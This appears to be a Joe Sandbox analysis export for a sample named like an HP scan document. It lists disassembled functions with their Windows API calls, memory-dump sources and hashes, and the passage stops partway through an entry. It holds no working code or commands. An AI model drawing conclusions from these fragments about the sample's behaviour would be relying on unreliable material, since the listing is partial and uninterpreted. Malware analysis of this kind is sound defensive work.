Instruction Fuzzy Hash: 3401E932100149BBDF125E99CC46EEB7B69FF98764F044414FE48A6121C736E961DBE1

Function 00843073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008113C6,00000000,00000000,?,0084301A,008113C6,00000000,00000000,00000000,?,0084328B,00000006,FlsSetValue), ref: 008430A5
GetLastError.KERNEL32(?,0084301A,008113C6,00000000,00000000,00000000,?,0084328B,00000006,FlsSetValue,008B2290,FlsSetValue,00000000,00000364,?,00842E46), ref: 008430B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0084301A,008113C6,00000000,00000000,00000000,?,0084328B,00000006,FlsSetValue,008B2290,FlsSetValue,00000000), ref: 008430BF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a495ce06e9082e76bb100198867c74f8200dfab9ae63a0a3f2e3c88c143f3194
Instruction ID: 0d39aabcaaada561ce6bfa8659a9df9b04534d8e5dcd2aac2d4f39c0f551cf95
Opcode Fuzzy Hash: a495ce06e9082e76bb100198867c74f8200dfab9ae63a0a3f2e3c88c143f3194
Instruction Fuzzy Hash: 03014E32301A2AABDB314B789C44A577BD8FF06B71B200720F905E7240CB21DD01C6E0

Function 00877464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0087747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00877497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008774AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008774CA

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: f6fa6737ca62b5028bb1e93edc27462fc249eea587cac4ddf6956ec3640d1998
Instruction ID: cd7025eb0b5b219e1f9f82a4429908403823ee5d5422c83ed54ca29c391ebaf8
Opcode Fuzzy Hash: f6fa6737ca62b5028bb1e93edc27462fc249eea587cac4ddf6956ec3640d1998
Instruction Fuzzy Hash: 81118EB12093159BF7208F24DC08B927BFCFB04B04F10C569A61AD6555D7B0E944DB98

Function 0087B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0087ACD3,?,00008000), ref: 0087B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0087ACD3,?,00008000), ref: 0087B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0087ACD3,?,00008000), ref: 0087B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0087ACD3,?,00008000), ref: 0087B126

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ece8c9bbfa408220dc36c8bf1943defcfa2e8b072f81a4e6acd6d960005f1601
Instruction ID: 335c273efdcec33ea3252cc758ec1f4fa3484ad3f24924cc69df86959124c64e
Opcode Fuzzy Hash: ece8c9bbfa408220dc36c8bf1943defcfa2e8b072f81a4e6acd6d960005f1601
Instruction Fuzzy Hash: 38117C30E0152DD7DF00AFE4E9687EEBB78FF0A311F008085D945B2145DB3085918B65

Function 00872DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00872DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00872DD6
GetCurrentThreadId.KERNEL32 ref: 00872DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00872DE4

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: caf9b77eaf14c7a95523af6734b9df01d90c9784492d8ecbe835efa11231e334
Instruction ID: c9f204e13d289a1f9c3bb234e9a601e5c815049e4e487c11bd16eea94a466b06
Opcode Fuzzy Hash: caf9b77eaf14c7a95523af6734b9df01d90c9784492d8ecbe835efa11231e334
Instruction Fuzzy Hash: D1E012B16052287BE7305B739C0DFEB7E6CFF57BA1F404119F50AD14909AA5C941C6B0

Function 008A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00829639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00829693
Part of subcall function 00829639: SelectObject.GDI32(?,00000000), ref: 008296A2
Part of subcall function 00829639: BeginPath.GDI32(?), ref: 008296B9
Part of subcall function 00829639: SelectObject.GDI32(?,00000000), ref: 008296E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008A8887
LineTo.GDI32(?,?,?), ref: 008A8894
EndPath.GDI32(?), ref: 008A88A4
StrokePath.GDI32(?), ref: 008A88B2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 4194ab208ed2d62784bcb0a96af73e61ebd53745f1fd397012b763e14bf84223
Instruction ID: d8fb30f4e1c3d7ee76d523d780a7196f2420225211d8d7a97e5c6e77a1fedd9e
Opcode Fuzzy Hash: 4194ab208ed2d62784bcb0a96af73e61ebd53745f1fd397012b763e14bf84223
Instruction Fuzzy Hash: 17F03A36045658FAEB126F94AC0DFCE3E59BF06310F448000FA11A54E2CB795551CBA9

Function 008298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008298CC
SetTextColor.GDI32(?,?), ref: 008298D6
SetBkMode.GDI32(?,00000001), ref: 008298E9
GetStockObject.GDI32(00000005), ref: 008298F1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 82a88f8ad3401d7700bc26ef8ad905bf42bcc5f4bf3e85cb1151fa6e60a6ede6
Instruction ID: e85a301ed0767817e4dceed4a52940ca3ebba8dccd31675d4aa79d360dbe61b6
Opcode Fuzzy Hash: 82a88f8ad3401d7700bc26ef8ad905bf42bcc5f4bf3e85cb1151fa6e60a6ede6
Instruction Fuzzy Hash: 3DE06D31244280AAEB215B74BC0DBE83F61FB13336F048219F6FA984E1C77246809B10

Function 0087162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00871634
OpenThreadToken.ADVAPI32(00000000,?,?,?,008711D9), ref: 0087163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008711D9), ref: 00871648
OpenProcessToken.ADVAPI32(00000000,?,?,?,008711D9), ref: 0087164F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 4ddf26440a961d8ba8e26641bf14a24f5231e0e95527ce489558c8959c61eb62
Instruction ID: 5cb9d100a12dee9a0f3ffd42428f2f0f0492014f60551e8dc2331866d5919947
Opcode Fuzzy Hash: 4ddf26440a961d8ba8e26641bf14a24f5231e0e95527ce489558c8959c61eb62
Instruction Fuzzy Hash: 34E08C32602211EBEB201FA5AE0DB873BBCFF56792F148808F249C9480EA388540CB60

Function 0086D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0086D858
GetDC.USER32(00000000), ref: 0086D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0086D882
ReleaseDC.USER32(?), ref: 0086D8A3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1bce8d339edf1806da5962e74b54f92e6d232b5e6229b747f3f0744b4817cb54
Instruction ID: 36bdff0617f8f45a55eb48bac9e64bbb2dd6fedc5241512380eade3e18de9dd5
Opcode Fuzzy Hash: 1bce8d339edf1806da5962e74b54f92e6d232b5e6229b747f3f0744b4817cb54
Instruction Fuzzy Hash: FAE01AB0800208DFDB419FA0D80C66DBBB5FB19310F109419E806E7750CB388941AF40

Function 0086D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0086D86C
GetDC.USER32(00000000), ref: 0086D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0086D882
ReleaseDC.USER32(?), ref: 0086D8A3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 5e7415956cef5788422355c7576713a226b4b0ee8d55a63a3dcd15fce1b84e83
Instruction ID: b5eea3b0b73ec0060532e985c5607dd124d347e47e3385808e0d169001aad6c7
Opcode Fuzzy Hash: 5e7415956cef5788422355c7576713a226b4b0ee8d55a63a3dcd15fce1b84e83
Instruction Fuzzy Hash: FCE012B0800204EFDB41AFA0D80866EBBB5FB18310B109008E80AE7760CB389942AF40

Function 00884D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00817620: _wcslen.LIBCMT ref: 00817625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00884ED4

Strings

LPT, xrefs: 00884DFB
*, xrefs: 00884E10

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 37b2aabcca376f6801c0ae6c44c3587b804a06910a0d7cd0e1c10c7e37450757
Instruction ID: 1cf7b925eaf80a0c34e1e1c543900a46ed6a081e7db964ff9365f092490cacea
Opcode Fuzzy Hash: 37b2aabcca376f6801c0ae6c44c3587b804a06910a0d7cd0e1c10c7e37450757
Instruction Fuzzy Hash: A2914A75A002059FCB14EF58C484EAABBB5FF44318F18909DE90A9F362DB35ED85CB91

Function 0083E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0083E30D

Strings

pow, xrefs: 0083E2E5, 0083E302

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5def7ce09ad62495d409d33ef6f4bc13ea5623d90ae562cfed03a0b16ba5aed8
Instruction ID: eed8ba0503fbd399c0b0042d102b0402cf0c1847dd5716c3cc96a5936a14dfd3
Opcode Fuzzy Hash: 5def7ce09ad62495d409d33ef6f4bc13ea5623d90ae562cfed03a0b16ba5aed8
Instruction Fuzzy Hash: 48512B61E1C20A96DB157728C9413BA3BA4FB80B40F744E68F0D5C63EDEF358C959AC6

Function 0082E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0082E1B1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7c68b429e5d68b61367992833169be3608f474c44932c1f8fc789585fc06c15f
Instruction ID: 4556106f470561206a6db3c08deeac102d2a16df287557cd272e8d0a81a1994a
Opcode Fuzzy Hash: 7c68b429e5d68b61367992833169be3608f474c44932c1f8fc789585fc06c15f
Instruction Fuzzy Hash: 9951233950025ADFDF15DF68D485AFA7BA8FF26310F244059F892DB2D0D6349D82CBA1

Function 0082F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0082F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0082F2BB

Strings

@, xrefs: 0082F2AF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: be47045f6b66b0bdfb8cdd3fd2d91c67a9cd1206e5822491f6b46767a44836af
Instruction ID: 7da5f998818ab42650d68e552cf76a7c59f5f7981ff1be1eed4cabc25172b6a1
Opcode Fuzzy Hash: be47045f6b66b0bdfb8cdd3fd2d91c67a9cd1206e5822491f6b46767a44836af
Instruction Fuzzy Hash: 09512571418B449BD320AF14D886BABBBFCFF85300F81885DF2D9811A5EB709569CB67

Function 00895745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008957E0
_wcslen.LIBCMT ref: 008957EC

Strings

CALLARGARRAY, xrefs: 008957E6, 008957EB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 4c6592cc3cc2865d6b16a067042869df8d45313f1495292be1671a9d6ffff0a2
Instruction ID: effa3ddb0e226fc93bd8c3f64d8fd70fbdfb6fb6f779f8499781985bd480b2cf
Opcode Fuzzy Hash: 4c6592cc3cc2865d6b16a067042869df8d45313f1495292be1671a9d6ffff0a2
Instruction Fuzzy Hash: A941AE71A002099FCF04EFA9C8859EEBBB5FF59724F148069E505E7291E7309D81CB91

Function 0088D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0088D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0088D13A

Strings

|, xrefs: 0088D10B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 32e93493c287f7c2e00d6278ce898fd2f4e9cd67e9a91db773c25a824288c465
Instruction ID: dd0c2e8da79077e7c41627ed5b7c2bc27eda91f4085055af24e4694837bf177b
Opcode Fuzzy Hash: 32e93493c287f7c2e00d6278ce898fd2f4e9cd67e9a91db773c25a824288c465
Instruction Fuzzy Hash: CE311975D00219ABCF15EFA8CC85AEEBFB9FF04300F100119F815E6166EB31AA56CB61

Function 008A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 008A3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008A365C

Strings

static, xrefs: 008A35BC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 02791141a566fa177f258b1abc586b294d1a2645aaa2589cd899a2c7bfa92d18
Instruction ID: 00dc7420d71a048c6abe6c0ec381e18b52da38ad663ba00b93b3bece0a34727c
Opcode Fuzzy Hash: 02791141a566fa177f258b1abc586b294d1a2645aaa2589cd899a2c7bfa92d18
Instruction Fuzzy Hash: 28318B71500604AEEB109F68DC80EFB73A9FF99724F008619F8A5D7280DA31AD91DB60

Function 008A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 008A461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008A4634

Strings

', xrefs: 008A458E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 950e127f3647ddbf4f30ece5d7768d15126ef2df46d9186fe7b94bb70208dcfa
Instruction ID: 0bf9d817e3adad4fe23feab810267e167f6e9b366ef4784aec4e54a9c85b72f9
Opcode Fuzzy Hash: 950e127f3647ddbf4f30ece5d7768d15126ef2df46d9186fe7b94bb70208dcfa
Instruction Fuzzy Hash: 51312874A0120A9FEF14CF69C980BDABBB5FF8A300F105069E904EB741D7B0A941CF90

Function 008A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008A327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008A3287

Strings

Combobox, xrefs: 008A3249

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d1373fc561a16150c0e4ab401aa0d09e384df0be69368b89288b0d167568788c
Instruction ID: 7c067a09a8394a5ccffd7e103a6c9d000e478924f014b4dd36bfa042bc5be73f
Opcode Fuzzy Hash: d1373fc561a16150c0e4ab401aa0d09e384df0be69368b89288b0d167568788c
Instruction Fuzzy Hash: B011B2713002087FFF219E94DC85FBB3B6AFB9A3A5F104129F918E7690D6319D5187A0

Function 008A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

